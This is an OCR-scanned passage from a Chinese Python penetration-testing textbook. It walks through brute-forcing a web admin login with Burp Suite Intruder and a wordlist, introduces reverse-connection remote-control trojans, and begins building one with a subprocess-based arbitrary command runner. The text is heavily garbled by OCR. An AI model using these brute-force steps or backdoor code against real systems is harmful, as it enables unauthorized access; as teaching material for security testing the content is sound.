以 将 这 个 数据 包 进行 复制 ， 修 改 之 后 再 提交 到 服务 器 处 。 所 以 Burp Suite 此 时 相当 于 一 个 代理 
服务 器 。 不 过 Burp Suite 的 功能 要 比 这 强大 得 多 ， 但 这 是 一 款 商业 软件 ，Kali Linux 2 中 集成 
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了 免费 版 ， 所 以 这 里 只 简单 介绍 它 破解 密码 的 功能 。 首 先 启 动 Burp Suite， 如 图 10-31 所 示 。 


i 
Burp Suite Free Edition v1.7.17 - Temporary Project ©g@e 
Burp Intruder Repeater Window Help 


Comparer | Entender Í Project options | 


Filter: Hiding not found tems; hiding CSS, image and general binary content: hiding 4xx responses; hiding empty folders 
Host | Method | URL. | Params | Sta. & | Length | MIME type | TÍ 


D D e Sg iia oraes 


图 10-31 Burp Suite 的 工作 界面 


首先 将 Burp Suite 设置 成 代理 工作 模式 ， 单 击 Proxy 标签 ， 如 图 10-32 所 示 。 


Burp Intruder Repeater window Help 


图 10-32 Burp Suite 的 工作 界面 


然后 切换 至 Proxy 选项 卡 的 Option 选项 卡 ， 如 图 10-33 所 示 。 


š A 
图 Proxy Listeners 
圈 Burp Proxy uses isteners to receive incoming HTTP requests from your browser. You wil need to configure your browser to use one of the listeners as k: 
server. 


图 10-33 将 Burp Suite 设置 为 代理 服务 器 
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现在 Burp Suite 成 为 一 个 工作 在 8080 端口 上 的 和 — asus: 
代理 服务 器 。 接 下 来 需要 在 浏览 器 中 将 代理 指定 为 
Burp Suite, 

然后 打开 浏览 器 。Kali Linux 2 中 默认 使 用 的 浏 
览 器 为 Firefox ESR， 然 后 单 击 右 侧 的 工具 菜单 ， 如 
图 10-34 所 示 。 

依次 在 Firefox 中 选中 Advanced 一 Network 一 
Settings…， 注 意 每 种 浏览 器 中 设置 都 不 一 样 ， 需 要 
考虑 具体 情况 ， 如 图 10-35 所 示 。 

打开 Setting 工作 界面 之 后 ， 在 代理 界面 中 进行 设置 ， 选 中 Manual proxy configuration, 
fE HTTP Proxy 处 输入 127.0.0.1, fE Port 处 输入 8080， 如 图 10-36 所 示 。 


Full Screen 


O š 


Preferences | 。 Add-ons 


图 10-34 fE Firefox 中 设置 代理 (一 ) 


Connection settings ° 
Configure Proxies to Access the Internet 
D No proxy 
O Auto-detect proxy settings for this network 
— Use system proxy setting 
HTTP Prony: [ 127.010. Por 
Use tnis proxy server for all protocols 
SSL Proxy: Port: gE 
ETP Proxy: Port: gE 
QE Advanced @ Esas o 
a 
General Data Choices | Network | Update Certificates 2SOCKS v4 @SOCKSYS Remote DNS 
B — No Proxy for. 
localhost, 127.0.0.1 
á Connection ii 
í eaaa a eaaet to Davina 
Example: mozilla org. net.nz, 192.168.1.0/24 
a Cached Web Content 区 
a Autometic proxy configuration URL: 
= Your web content cache Is currently using 24.8 MB of disk space Clear ÑËw [ leait 1 
oa 
Qverride automatic cache management z 
á l Limit cacheto 350 ` MB of space [C Do not prompt tor authentication f password is saved 
Offline Web Content and User Data =Z 
ma re lll D ca mn 
图 10-35 在 Firefox 中 设置 代理 (二 ) 图 10-36 在 Firefox 中 设置 代理 (三 ) 


设置 完成 之 后 ， 单 击 OK 按钮 。 然 后 用 这 个 浏览 器 来 访问 目标 登录 界面 ， 这 里 的 目标 登 
录 界 面 的 地 址 为 http://192.168.1.103/webadmin/， 但 是 需要 注意 的 是 ， 此 时 的 页 面 不 会 有 任何 
变化 ， 如 图 10-37 所 示 。 

因为 此 时 浏览 器 中 向 目标 服务 器 发 送 的 请 求 都 被 Burp Suite 所 截获 ， 所 以 现在 服务 器 
并 没有 返回 任何 数据 。 现 在 切换 回 Burp Suite 来 处 理 截 获 的 数据 包 。 通 常 有 三 种 方法 : 放行 
(Forward), £F (Drop) 和 操作 (Action)， 如 图 10-38 所 示 。 
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Kali Linux, an OffensÍ 


[E Most Visited» BEOtfensive Security Ç Kali Linux \ Kali Docs S Kali Tools 加 Boplot-D8 WiAircrack-ng 


KALI 


图 10-37 在 浏览 器 中 输入 目标 地 址 


Burp Suite Free Edition v1.7.17 - Temporary P| 
Burp Intruder Repeater Window Help 


ET / HTTP/1.1 

lost: 192. 168. 1. 103 

lser-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45. 0 
ccept: text/html, application/xhtml+xml, application/xml; q0. 9, */*; q0, 8 

ccept -Language: en-US, en; q0. 5 

‘onnection: close 


图 10-38 Burp Suite 对 数据 包 的 几 种 操作 
在 这 里 选择 放行 之 前 的 数据 包 ， 这 样 才能 正常 访问 登录 界面 ， 如 图 10-39 所 示 。 


| > = 
Most Visited» BBOffensive Security ‘Ñ Kali Linux ‘Ñ Kali Docs "Ñ Kali Tools » 
管理 员 登录 
用 户 各 : 
密码 
确定 重 写 


图 10-39 目标 登录 界面 
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接 下 来 构造 登录 数据 包 。 在 登录 页 面 中 输入 一 个 用 户 名 “ admin”( 在 这 个 例子 中 ,假设 
已 经 知道 正确 的 用 户 名 为 “admin”， 密 码 未 知 )， 密 码 随 意 输入 一 个 ， 例 如 “000000”。 然 后 
单 击 “ 确 定 ” 按 钮 ， 如 图 10-40 所 示 。 


(G) © | 192.168.1.103/webadmin/ © [|Q Search 


Most Visitedv BWOffensive Security ‘Ñ Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools 


| 管理 员 登 录 

l 

| 用 户 名 : [admin 

| :Cd | 

| 
L J 


图 10-40 在 登录 界面 输入 用 户 名 和 密码 


切换 到 Burp Suite， 这 时 “ Intercept” 变 成 黄 颜色 ， 表 示 截 获 到 数据 包 ， 这 个 数据 包 的 
格式 如 下 所 示 ， 最 关键 的 是 红颜 色 所 括 起 来 的 部 分 ， 如 图 10-41 所 示 。 


Request to http.//192 168.1 103:80 
(tomara) rte ) 
fian | Params [ Headers [ Hex | 


POST / in/login.ASP HTTP/1.1 

Host: 192. 168. 1. 103 

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 
Accept: text/html, application/xhtml+xml , application/xml; q=0. 9, */*; q=0. 8 
Accept-Language: en-US, en; q=0. 

Referer: http: //192. 168. 1. 103/webadmin/ 

Cookie: JX0VCECBSSJAZWHZXLYU=LUBZKBAAGOKUIIKTBSTHJMTBJJQDIFHQJMQAQVVZ 
Connection: close 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 55 


|AdminName=admin&AdminPassword=00000&Submit=%C8%87%B6NA8 


图 10-41 截获 到 的 登录 数据 包 
数据 包 其 他 部 分 都 是 一 样 的 ， 只 有 红颜 色 的 部 分 不 一 样 。 按 照 之 前 的 思路 ， 只 需要 用 字 
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典 中 的 单词 蔡 换 “000000” 即 可 。Burmp Suite 中 有 相关 的 模块 ， 只 需要 在 文字 区 域内 右 击 ， 
然后 在 弹出 的 菜单 选择 Send to Intruder， 如 图 10-42 所 示 。 


Linux i686; rv:45.0) Gecko/20100101 Firefox/45. 0 
xhtml +xml , application/xml; q0. 9, */*; q0. 8 
5 


webadmin, 
'UBZKBAAGOKUIIKTBSTHJMTBJJQDIFHQJMQAQVVZ 


Sendto Spider 

pw-form-urlencoded SAER < 

— c 
'00000&Submit=%C8%B7%B6NA8 dto Repeat tri+R 
Sendto Sequencer 
Sendto Comparer 
Sendto Decoder 
Request in browser > 
Engagement tools [Pro version only] > 
Change request method 

Change body encoding 

Copy URL 

Copy as curl command 

Copy to fle 


图 10-42 将 数据 包 转 到 Intruder 模块 
然后 单 击 上 面 的 Intruder 标签 ， 并 在 其 中 选择 Positions， 如 图 10-43 所 示 。 


Burp Suite Free Edition v1.7.17 - Temporary Project |° ee 
Burp Intruder Repeater Windom Help 


Targat Payloads | options 


图 Payload Positions Start attack 


Configure the positions where payloads wil be inserted into the base request The attack type determines the way in which payloads 
are assigned to payload postions - see help for full details. 


Attack type. | Sniper [O] 


[POST /wabadnin/login ASP HTTP/ 1 T Adds 
Host: 192 168 1.103 
gent: Mozilla/5.0 (X11; Linux i686; ry:45.0) Gecko/20100101 Firefox/45. 0 一 一 一 一 
ept: text/htel, application/xhtel+xml, application/xml; q0. 9, =/"; q0. 8 cund 
ept-Language: en-US, en; q0. 5 
http: //192. 168. 1. 103/vebadain/ Aitos 
[Cookie JXOVCECBSS] ATwHZXL Yu» ŞEUBZKBAAGOKUTIKTESTHJNTBJJQOIFHQINNQVVZS 
Connection: close [een J 
Content-Type: application/x-we-forn-urlencoded 


Content-Length: 55 
AdminNamer FERRA sAdminPassvor o- S000 Subn: t- FEENS 


B A A e ersehen O matches Clear 


4 payload postions Length: 507 


图 10-43 Intruder 模块 界面 


在 这 个 模块 中 ,需要 向 Burp Suite 指明 密码 所 在 的 位 置 ， 在 这 个 操作 界面 中 ，Burp Suite 
并 不 能 确切 地 知道 密码 所 在 的 位 置 ， 但 是 它 给 出 了 4 个 可 能 的 位 置 ， 也 就 是 图 10-43 中 阴影 
部 分 。Burp Suite 中 使 用 一 对 “$” 来 前 后 表示 密码 的 区 域 。 在 这 里 单 击 右边 的 Clear $ 按钮 ， 
清除 所 有 默认 参数 ， 如 图 10-44 所 示 。 
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Attack type: | Sniper 1) 


POST /webadmin/login. ASP HTTP/1.1 T 
Host: 192. 168. 1. 103 

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Ca Eee /45.0 

Accept: text/html, application/xhtml+xml, application/xml; q0. 9, *, Clear 5 
Accept-Language: en-US, en; qro. 


Referer: http: //192. 168. 1. 103/vebadmin/ Auto5 
Cookie: JX0VCECBSSJAZWHZXLYU=LUBZKBAAGOKUTIKTBSTHJMTBJJQOIFHQJMQAQVVZ 

Connection: close — 
Content-Type: application/x-www-form-urlencoded Crer 
Content-Length: 55 


AdminName=adminéAdminPassword= 000006Submit=NCBBTNBGYAS 


B S e e [fr O matches Clear 


图 10-44 单 击 Clear$ 


后 鼠标 移动 到 密码 位 置 ， 也 就 是 “000000” 的 前 面 ， 单 击 Adds 按钮 ; 再 将 鼠标 移动 
到 “000000” 后 面 ， 单 击 Add$ 按钮 。 这 样 就 成 功 地 标示 出 密码 的 位 置 ， 也 就 是 一 会 儿 要 用 
字典 替换 的 位 置 ， 如 图 10-45 所 示 。 


POST /webadmin/login. ASP HTTP/1.1 
Host: 192.168. 1.103 
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45. 0 
Accept: text/html, application/xhtml+xml , application/xml; 0. 9, */*; q0. 
Accept-Language: en-US, en; 0. 5 

Referer: http: //192. 168. 1. 103/webadmin/ 

Cookie: JX0VCECBSSJAZWHZXLYU=LUBZKBAAGOKUIIKTBSTHJMTBJJQDIFHQJMQAQVVZ 
Connection: close 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 55 


AdminName=admin&AdminPassvord=$000008Subni t=sCSNB7sB6NAS 


图 10-45 ”设置 完 密码 位 置 的 ntruder 
切换 到 Payloads 选项 卡 ， 选 择 要 使 用 的 Payload type， 这 里 选择 要 设 定 进 行 密码 破解 目 
标的 个 数 ， 如 图 10-46 所 示 。 例 如 只 破解 密码 ， 这 里 Payload set 的 值 就 是 1。 例如 ， 既 不 知 
道 用 户 名 又 不 知道 密码 的 时 候 ， 这 里 面 就 要 选择 2。Payload type 的 类 型 选择 Simple list 


@ Payload sets | start attack | n 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in the Positions tab. 
Various payload types are avalable for each payload set. and each payload type can be customized in different ways. 


Payload set |1 司 Payload count 0 
reniope sme 国 wwece。 


图 10-46 Payloads 的 操作 界面 


免费 版 比 专业 版 少 了 一 些 功 能 ， 接 下 来 是 加 入 使 用 的 字典 文件 ， 在 下 方 单 击 Load… 按 
钮 ， 如 图 10-47 所 示 。 
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@ Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used as payloads. 


Cem) , 
=] 


c» 


` Add from list ... [Pro version only] iej 
图 10-47 选择 要 使 用 的 字典 (一 ) 
在 这 里 选中 下 载 的 wordlist.txt 作为 破解 的 字典 ， 如 图 10-48 所 示 。 


° 
Lookin: |l Downloads 17) [@ )( @ )[@ ) DL) 


Ë Aptana_Studio_3_Setup_Linux_x86_3.6.1 
国 Aptana_studio_3_Setup_Linux_x86_3.6.1 zip 
wordlist. txt 


FileName: Í wordist txt 
FiesofIype [AlFies W) 


(cance ) 
图 10-48 ”选择 要 使 用 的 字典 (二 ) 
设置 完成 之 后 ， 就 单 击 菜单 栏 中 的 Intruder — Start attack， 如 图 10-49 所 示 。 


Actively scan defined insertion points [Pro version only] 
Sendto Repeater 


Save attack config [Pro version only] 

Load attack config [Pro version only] 

Copy attack config 

New tab behavior 

Automatic payload positions 

Configure predefined payload lists [Pro version only] 


AAA 4 É, Ah S: 2 


图 10-49 开始 Intruder 攻击 
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现在 开始 扫描 ， 免 费 版 由 于 限制 了 多 线程 ， 所 以 进展 十 分 缓慢 ， 如 图 10-50 所 示 。 


Intruder attack 1 eoo 


图 
ass 国 
498 
250 
250 
458 
250 
250 
250 
498 
498 
498 
498 MA 


14of2108 [ 1 


图 10-50 ”攻击 过 程 

扫描 到 差不多 的 时 候 ， 可 以 根据 Status 或 者 Length (长 度 ) HEF. DA Status 为 例 ， 可 以 
看 到 所 有 的 数据 包 被 分 成 两 种 ， 一 种 为 302， 其 他 的 为 200， 如 图 10-51 所 示 。 当 然 有 时 可 能 
会 不 同 ， 需 要 查看 一 下 Length, 一般 Length 与 大 多 数 数 据 包 不 同 的 就 是 正确 的 。 
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Filter: Showing allitems 

Y 7 四 加 | 
i 200 目 日 338 
2 %null% 200 B Ü 250 
3 username% 200 目 Ü 250 
4 !@#$ 200 口 Ü s 
5 !@#$% 200 D Ü 250 
6 !@#$%“ 200 D Ü 250 
7 !@#$%“& 200 O Ü 250 
8 !@#$% ~ Ee* 200 D Ü 250 
9 000000 200 B O 458 
10 00000000 200 B O 8 
11 0123456789 200 B Ü “s 


图 10-51 对 数据 包 发 送 的 结果 进行 排序 
使 用 Burp Suite 其 实 是 一 种 十 分 通用 的 办 法 。 
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小 结 


本 章 介绍 了 一 些 网 络 渗透 中 常见 的 密码 破解 方式 。 首 先 以 FTP 服务 为 例 ， 讲 解 了 如 何 使 
用 了 Python 编写 程序 来 破解 常见 的 网 络 服务 加 密 。 其 次 介绍 了 如 何 针对 Web 页 面 中 的 密码 进 
行 破解 。 这 两 种 破解 方式 采用 的 都 是 暴力 穷 举 方式 ， 虽 然 这 种 方式 在 目前 的 实际 成 功率 并 不 
高 ， 但 却 是 在 渗透 测试 时 必需 进行 的 步骤 。 然 后 介绍 了 对 使 用 哈 希 加 密 的 密码 的 破解 ， 哈 和 希 
加 密 算 法 有 很 多 ， 因 此 这 里 也 只 介绍 了 如 何 使 用 Kali Linux 2 来 识别 一 个 哈 希 值 是 采用 了 何 
种 加 密 方法 。 本 章 的 最 后 讲解 了 如 何在 Kali Linux 2 中 使 用 字典 文件 。 

现 阶段 ， 密 码 是 一 个 常见 的 认证 方式 ， 除 了 在 网 络 应 用 中 大 量 使 用 之 外 ， 大 量 软 件 也 都 
使 用 验证 码 的 方式 ， 限 于 本 书 的 篇 幅 ， 本 文 只 介绍 了 前 者 。 


二 和 SI 具 11 


在 普通 人 的 心目 中 ， 黑 客 就 等 同 于 信息 泄露 、 系 统 竣 痰 以 及 远程 控制 。 电 影 中 的 黑客 可 
以 随心 所 和 欲 地 控制 别人 的 计算 机 ， 坐 在 家 里 就 黑 了 五 角 大 楼 的 桥 段 已 经 屡见不鲜 。 但 是 在 现 
实生 活 中 ， 这 是 很 难 发 生 的 。 原 因 很 简单 ， 某 些 机 构 和 大 型 企业 雇佣 的 黑客 水 平 并 不 比 散落 
民间 的 少 。 无 论 是 为 谁 工作 ， 这 些 人 都 必须 要 不 断 地 研究 两 种 程序 ， 一 种 是 针对 系统 漏洞 的 
渗透 程序 ， 另 一 种 就 是 用 来 实现 远程 控制 的 程序 。 

打 个 比方 ， 在 战争 时 期 ， 军 队 攻 破 了 敌 方 城堡 的 大 门 ， 那 么 接 下 来 作为 军队 指挥 官 会 选 
择 做 什么 呢 ? 往 大 门 里 扔 炸药 ， 毁 灭 这 个 城堡 ? 还 是 派 军 队 冲 进去 ， 接 管 城市 的 控制 权 ? E 
然 ， 占 领 要 比 毁 灭 更 有 价值 ， 对 渗透 来 说 也 是 一 样 ， 渗 透 程序 的 作用 就 是 打开 一 扇 通 往 目 标 
的 大 门 ， 接 下 来 应 该 将 实现 远程 控制 的 程序 安装 到 目标 系统 中 ， 这 样 就 可 以 占领 这 个 系统 。 

怎么 样 ， 是 不 是 听 起 来 就 很 激动 人 心 呢 ? 远程 控制 程序 是 一 个 很 常见 的 计算 机 用 语 ， 指 
的 是 可 以 在 一 台 设 备 上 操纵 另 一 台 设备 的 软件 。 在 平时 的 生活 中 ， 很 多 人 会 将 这 个 词汇 与 
“木马 ”混为一谈 。 


11.1 远程 控制 工具 简介 

通常 情况 下 ， 远 程控 制程 序 一 般 分 成 两 个 部 分 : 被 控 端 和 主 控 端 。 如 果 一 台 计 算 机 上 执 
行 了 这 个 被 控 端 ， 就 会 被 另外 一 台 装 有 主 控 端 的 计算 机 所 控制 了 。 曾 经 在 整个 中 华 大 地 上 掀 
起 了 艇 艇 烈 烈 的 全 民 黑客 运动 的 “ 灰 久子 ”就 是 这 样 一 个 远程 控制 软件 ， 据 统计 ， 早 在 2005 


* 
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年 的 时 候 ,“ 灰 鸽子 ”就 已 经 感染 了 近 百 万 台 计 算 机 。 

现在 世界 上 被 广泛 使 用 的 远程 控制 软件 有 很 多 种 ， 其 中 既 有 一 些 确实 是 为 人 们 提供 工作 
便利 的 正常 软件 ， 例 如 TeamViewer， 也 有 一 些 是 专门 为 黑客 人 侵 所 打造 的 后 门 木 马 。 

在 这 里 并 不 去 考虑 这 些 软件 的 目的 是 善意 还 是 恶意 ， 而 是 从 技术 的 角度 对 其 进行 分 类 。 
实际 上 ， 远 程控 制 软 件 的 分 类 标准 有 很 多 ， 这 里 只 介绍 两 个 最 为 常用 的 标准 。 

第 一 个 标准 就 是 远程 控制 软件 被 控 端 与 主 控 端 的 连接 方式 。 按 照 不 同 的 连接 方式 ， 可 以 
将 远程 控制 软件 分 为 正 向 和 反 向 两 种 。 

假设 这 样 一 个 场景 ， 一 个 黑客 设法 在 受害 者 的 计算 机 上 执行 了 远程 控制 软件 服务 端 ， 那 
么 把 黑客 现在 所 使 用 的 计算 机 称 为 Hacker， 而 把 受害 者 所 使 用 的 计算 机 称 为 A。 如 果 说 黑客 
所 使 用 的 远程 控制 软件 是 正 向 的 ， 那么 计算 机 A 在 执行 了 这 个 远程 控制 服务 端 之 后 ， 只 会 
自己 的 主机 上 打开 一 个 端口 ， 然 后 等 待 Hacker 计算 机 连接 ， 注 意 此 时 A 计算 机 并 不 会 去 主 
动 通知 Hacker 计算 机 (而 反 向 控制 软件 会 )， 因 此 黑客 必须 知道 计算 机 A 的 IP 地址。 这 导致 
了 正 向 控制 在 实际 操作 中 具有 很 大 的 困难 。 

而 反 向 远程 控制 则 截然 不 同 ， 当 计算 机 A 在 执行 了 这 个 远程 控制 被 控 端 之 后 ， 会 主动 去 
通知 Hacker 计算 机 ,“ 嗨 ， 我 现在 受 你 的 控制 了 ， 请 下 命令 吧 ”， 因 此 黑客 也 无 须知 道 计算 机 
人 A 的 他 地 址 ， 只 需要 把 这 个 远程 控制 被 控 端 发 送 给 目标 即 可 。 现 在 黑客 所 使 用 的 远程 控制 软 
件 大 都 采用 了 反 向 控制 。 

另外 一 种 常见 的 分 类 方法 就 是 按照 目标 操作 系统 的 不 同 而 分 类 ， 这 就 很 容易 理解 了 , F 
时 在 Windows 上 运行 的 软件 大 都 是 exe 文件 ， 而 Android 操作 系统 上 则 大 都 是 apk 文件 。 显 
然 你 制造 的 一 个 Windows 平台 下 使 用 的 远程 控制 被 控 端 对 于 手机 使 用 的 Android 操作 系统 是 
毫 无 作用 的 。 目 前 常见 的 操作 系统 主要 有 微软 的 Windows, KAY Android, WRH iOS 以 
及 各 种 Linux 系统 。 

另外 ， 随 着 互联 网 的 不 断 发 展 ， 针 对 各 种 网 站 开发 技术 的 远程 控制 软件 也 出 现 了 ， 这 些 
远程 控制 软件 也 都 采用 和 网 站 开发 相同 的 语言 ， 例 如 ASP, PHP 等 。 


11.2 Python 中 的 控制 基础 subprocess 模块 


接 下 来 编写 一 个 远程 控制 工具 。 这 个 远程 控制 工具 要 分 成 服务 端 和 控制 端 两 个 部 分 ， 服 
务 端 主要 用 来 发 送 控制 命令 和 接收 执行 结果 ， 控 制 端 主要 用 来 接收 并 执行 控制 命令 。 程 序 编 
写 先 从 控制 命令 的 执行 开始 ， 首 先 来 介绍 一 下 用 来 执行 控制 命令 的 subprocess 模块 。 

这 个 模块 的 主要 作用 是 执行 外 部 的 命令 和 程序 ，subprocess 也 是 替换 了 一 些 以 前 旧 的 模 
块 和 函数 ， 例 如 os.system、os.spawn*、os.popen*、popen2.*、commands.* 等 。 

对 操作 系统 有 了 解 的 读者 都 会 明白 ， 当 运行 Python 的 时 候 ， 其 实 也 是 在 运行 一 个 进程 。 
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在 Python 中 ， 可 以 通过 标准 库 中 的 subprocess 来 fork 一 个 子 进程 ，subprocess 中 包含 多 个 创 
建 子 进程 的 函数 。 


1. subpiocess. call(algs, *, stdh= N one stdout N one stde= N one shell F alse 

这 里 面 最 为 重要 的 参数 就 是 args， 它 可 以 是 一 个 字符 串 ， 也 可 以 是 一 个 包含 程序 参数 的 
列表 ， 用 来 指明 需要 执行 的 命令 ， 使 用 这 个 参数 就 可 以 在 Python 中 执行 对 应 命令 ， 如 果 是 序 
列 类 型 ， 第 一 个 元 素 通常 是 可 执行 文件 的 路 径 。 也 可 以 显 式 地 使 用 executeable 参数 来 指定 可 
执行 文件 的 路 径 。 

stdin, stdout, stderr 分 别 表示 程序 的 标准 输入 、 输 出 、 错 误 句 柄 。 它 们 可 以 是 PIPE, 文 
件 描述 符 或 文件 对 象 ， 默 认 值 为 None， 表 示 从 父 进程 继承 。 

shell=True 参数 会 让 subprocess.call 接受 字符 串 类 型 的 变量 作为 命令 ， 并 调用 shell 去 执 
行 这 个 字符 串 ; ` shell=False 时 ，subprocess.call 只 接受 数组 变量 作为 命令 ， 并 将 数组 的 第 
一 个 元 素 作 为 命令 ， 剩 下 的 全 部 作为 该 命令 的 参数 。 

如 果子 进程 不 需要 进行 交互 操作 ， 就 可 以 使 用 该 函数 来 创建 。 接 下 来 使 用 这 个 函数 来 启 
动 目标 系统 (Windows 7) 上 的 记事 本 文件 ， 这 个 文件 平时 可 以 在 运行 中 直接 输入 “ notepad. 
exe” KTF, WE 11-1 所 示 。 


现在 在 Python 中 完成 同样 的 操作 ， 首 先导 入 需要 使 用 的 subprocess 库 : 

>>>import subprocess 

其 次 使 用 subprocess.call 来 执行 这 个 命令 : 

>>>child=subprocess.call ("notepad.exe") 

然后 会 发 现在 Windows 系统 上 启动 了 一 个 记事 本 文件 ， 这 表明 Python 正确 地 执行 了 
想 要 的 命令 。 不 过 ， 此 时 可 能 更 关心 的 是 child 的 值 ， 这 其 实 就 是 subprocess.call ( "notepad. 
exe") 的 返回 值 ， 先 关闭 打开 的 记事 本 文件 ， 然 后 执行 : 


>>>print child 
0 
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这 里 的 返回 值 为 0， 其实 就 是 退出 信息 (returncode, 0 表示 成 功 ， 非 0 表示 失败 )。 

2. subpiocess. check_call() 

这 个 函数 的 作用 与 前 面 的 subprocess.call() 几乎 是 相同 的 ， 使 用 这 个 函数 来 对 目标 执行 
一 次 ping 命令 ， 以 下 两 条 语句 的 效果 是 相同 的 。 


>>>child=subprocess. check call (["ping","www.baidu.com.cn"]) 
>>>child=subprocess. check call ("ping www.baidu.com.cn",shell=True) 


将 child 的 值 打印 输出 如 下 所 示 。 


>>>print child 
0 


不 同 之 处 在 于 subprocess.check_call() 会 对 返回 值 进行 检查 ， 如 果 返 回 值 非 0， 则 会 抛 出 
CalledProcessError 异常 ， 这 个 异常 会 有 个 returncode 属性 ， 记 录 子 进程 的 返回 值 ， 可 用 try… 
except… 来 检查 。 


3. subpocess. check_output() 

这 个 函数 与 前 两 个 函数 的 区 别 在 于 它 会 返回 子 进程 向 标准 输出 的 输出 结果 。 这 个 函数 在 
进行 互动 的 时 候 相当 有 用 。 

检查 退出 信息 ， 如 果 returncode 不 为 0， 则 抛 出 错误 subprocess.CalledProcessError， 该 
对 象 包含 returncode 属性 和 output 属性 ，output 属性 为 标准 输出 的 输出 结果 ， 可 用 try… 
except… 来 检查 。 

>>>child=subprocess.check_output ("ping www.baidu.com.cn",shell=True) 

输出 这 个 结果 查看 一 下 这 个 结果 。 


>>>print child 

正在 Ping www.a.shifen.com [61.135.169.125] 具有 32 字 节 的 数据 : 
来 自 61.135.169.125 的 回复 : 字 节 =32 时 间 =6ms TTL=50 

来 自 61.135.169.125 的 回复 : 字 节 =32 时 间 =5ms TTL=50 

来 自 61.135.169.125 的 回复 : 字 节 =32 时 间 =8ms TTL=50 

来 自 61.135.169.125 的 回复 : 字 节 =32 时 间 =8ms TTL=50 
61.135.169.125 的 Ping 统计 信息 : 

数据 包 : 已 发 送 = 4， 已 接收 = 4, 丢失 = 0 (0% 丢失 )， 
往返 行程 的 估计 时 间 ( 以 毫秒 为 单位 ) : 

最 短 = 5ms， 最 长 = 8ms， 平 均 = 6ms 


4. subpiocess. P open 
上 面 的 三 个 函数 都 是 基于 Popen() 的 封装 。 如 果 读 者 希望 能 够 按照 自己 的 想法 来 使 用 一 
些 功 能 时 ，Popen 就 成 了 一 个 最 好 的 选择 ， 这 个 类 的 格式 如 下 所 示 。 


classPopen(args, bufsize=0, executable=None,stdin=None, stdout=None, stderr=None, 
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preexec_fn=None, close fds=False, shell=False.cwd=None, env=None, universal_newlines=False, 
startupinfo=None, creationflags=0): 

这 里 面 最 重要 的 参数 就 是 args， 同 样 这 个 args 参数 可 以 是 一 个 字符 串 ， 也 可 以 是 一 个 包 
含 程序 参数 的 列表 。 要 执行 的 程序 一 般 就 是 这 个 列表 的 第 一 项 ,或 者 是 字符 串 本 身 。 

subprocess . Popen ( ["notepad", "test.txt"]) 

另外 ， 需 要 注意 的 是 ，Popen 对 象 创 建 后 ， 主 程序 不 会 自动 等 待 子 进程 完成 ， 创 建 一 个 
Python 程序 ， 输 入 如 下 代码 ， 然 后 执行 。 


import subprocess 
child= subprocess.Popen(["ping","www.baidu.com"]) 
print "parent process" 


从 运行 结果 中 看 到 ，Python 程序 首先 输出 了 “parent process”， 然 后 才 弹 出 命令 行 窗口 
来 执行 ping 命令 。 

如 果 需 要 等 待 子 进程 ， 就 需要 使 用 wait()， 接 下 来 看 看 添加 了 这 个 函数 的 程序 。 

import subprocess 

child= subprocess.Popen(["ping","www.baidu.com"]) 


child.wait() 
print ("parent process") 


执行 这 个 程序 之 后 ，Python 程序 就 会 弹出 命令 行 窗口 以 执行 ping 命令 ， 执 行 完毕 之 后 
才 输 出 “parent process”. 

现在 已 经 掌握 了 subprocess 的 基本 用 法 ， 接 下 来 利用 这 个 模块 编写 一 个 执行 指定 命令 的 
函数 。 这 个 函数 很 简单 ， 只 需要 一 个 参数 用 来 表示 需要 执行 的 命令 ,返回 值 为 执行 结果 。 

def run command (command) : 


#rstrip() 用 来 删除 string 字符 串 末 尾 的 指定 字符 (默认 为 空格 ) 


command=command.rstrip() 


try: 

child = subprocess.check_output (command, shell=True) 
except: 

child = 'Can not execute the command.\r\n' 


return child 
接 下 来 验证 一 下 这 个 函数 ， 例 如 希望 目标 执行 的 命令 为 显示 C 盘 下 所 有 内 容 。 


execute="dir c:" 
output = run command (execute) 
print output 


执行 之 后 ， 会 显示 出 目标 主机 C 盘 下 的 所 有 目录 和 文件 ， 如 图 11-2 所 示 。 


228 » Python 渗透 测试 编程 技术 : 方法 与 实践 


[$ Python 2.7.13 Shell Eem) 


Fle Edit Shell Debug Options Window Help 


C:\Python27 的 目录 


2017/11/24 17:08 <DIR> 
<DIR> 


300 ad. py 
DLLs 


<DIR> 
<DIR> 
<DIR> include 
<DIR> Lib 
<DIR> libs 
38,591 LICENSE. txt 
474,595 NEWS. txt 
110 nihao. py 

28, 160 python. exe 


<DIR> 
DIR 
114 
2017/11/23 10:09 <DIR> ools 
8 E$ 626,854 字 节 
10 个 目录 11, 734, 335, 488 可 用 字 节 


图 11-2 显示 出 目标 主机 C 盘 下 的 所 有 目录 和 文件 


113 利用 客户 端 向 服务 端 发 送 控制 命令 


现在 读者 已 经 掌握 如 何 编写 一 段 可 以 在 本 机 上 进行 控制 的 程序 ， 可 以 将 这 个 程序 写 得 
更 加 完善 ， 例 如 ， 监 听 系 统 的 键盘 和 鼠标 ， 对 系统 的 当前 屏幕 进行 截图 ,但 是 这 需要 一 些 
Windows 编程 方面 的 知识 。 如 果 读 者 对 此 感 兴趣 ， 可 以 去 阅读 一 些 Windows 编程 的 资料 。 

接 下 来 回顾 一 下 前 面 使 用 的 socket 编写 的 那个 客户 端 与 服务 端 通信 的 程序 ， 这 里 首先 考 
虑 客户 端 。 

(1 ) 创建 套 接 字 ， 连 接 远 端 地 址 。 

(2 ) 连接 后 发 送 数据 和 接收 数据 。 

(3 ) 传输 完毕 后 ， 关 闭 套 接 字 。 

而 服务 端的 实现 要 复杂 一 些 。 

(1 ) 创建 套 接 字 。 

(2) 绑 定 端口 。 

(3 ) 对 套 接 字 进行 监听 。 

(4) 拿 到 请 求 的 对 象 和 地 址 。 

(5 ) 连接 后 发 送 数 据 和 接收 数据 。 

(6) 传输 完毕 后 ， 关 闭 套 接 字 。 

在 服务 端的 第 4 步 ， 需 要 使 用 accept() 函数 来 获取 请 求 的 对 象 和 地 址 。 使 用 accept 后 
会 阻塞 ， 直 到 有 一 个 客户 端 请 求 连接 ， 这 时 accept 返回 一 个 新 的 SOCKET s2， 就 用 这 个 s2 
